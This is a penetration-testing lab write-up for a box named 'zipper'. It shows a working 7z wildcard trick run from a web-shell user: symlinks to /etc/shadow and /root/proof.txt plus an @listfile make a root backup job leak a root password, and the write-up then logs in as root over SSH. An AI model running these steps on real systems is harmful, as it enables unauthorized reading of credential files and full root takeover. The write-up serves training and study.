7z(7za) Wildcard Exploit
In 7z(7za), the wildcard bit, *, can be abused to cause an arbitrary file read by placing crafted files in the working directory. If a root-executed command like 7za a /backup/$filename.zip -t7z -snl -p$pass -- * is used, creating an @root.txt file and a root.txt symlink pointing to a target file enables the attack. 7z treats @root.txt as a reference to a file list and reads the content of the symlinked file instead. Since the content is not a valid file list, 7z throws an error and leaks the target file’s content.
www-data@zipper:/var/www/html/uploads$ ln -s /etc/shadow pe.zip
www-data@zipper:/var/www/html/uploads$ touch @pe.zipGiven the 7za command only archives those with the .zip extension, it must be respected
Creating a symlink file to the /etc/shadow file and the @pe.zip file to indicate that pe.zip is a @listfile
www-data@zipper:/var/www/html/uploads$ cat /opt/backups/backup.log
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 3629
Scanning the drive:
3 files, 2867 bytes (3 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 3
Files read from disk: 3
Archive size: 3629 bytes (4 KiB)
Everything is OkIt appears to have failed as there is no error
This failed because the /etc/shadow file contains a list of credentials thus being treated as a “list”
www-data@zipper:/var/www/html/uploads$ ln -s /root/proof.txt pe.zipChanging the symlink file to point to the /root/proof.txt file
www-data@zipper:/var/www/html/uploads$ cat /opt/backups/backup.log
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 3633
Scanning the drive:
3 files, 2889 bytes (3 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 3
Files read from disk: 3
Archive size: 3633 bytes (4 KiB)
Scan WARNINGS for files and folders:
8248e94ab886dabea783c8a7828a621a : No more files
----------------
Scan WARNINGS: 1It worked this time as it revealed the content of the /root/proof.txt file; 8248e94ab886dabea783c8a7828a621a
/root/secret
The content of /root/secret file has already been revealed and validated as there has been an exploit attempt
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zipper/test]
└─$ sshpass -p WildCardsGoingWild ssh root@$IP
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
54 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Apr 6 15:16:32 2025 from 192.168.45.249
root@zipper:~# whoami
root
root@zipper:~# hostname
zipper
root@zipper:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:95:bf brd ff:ff:ff:ff:ff:ff
inet 192.168.201.229/24 brd 192.168.201.255 scope global ens160
valid_lft forever preferred_lft foreverIt was the password of the root account
System level compromise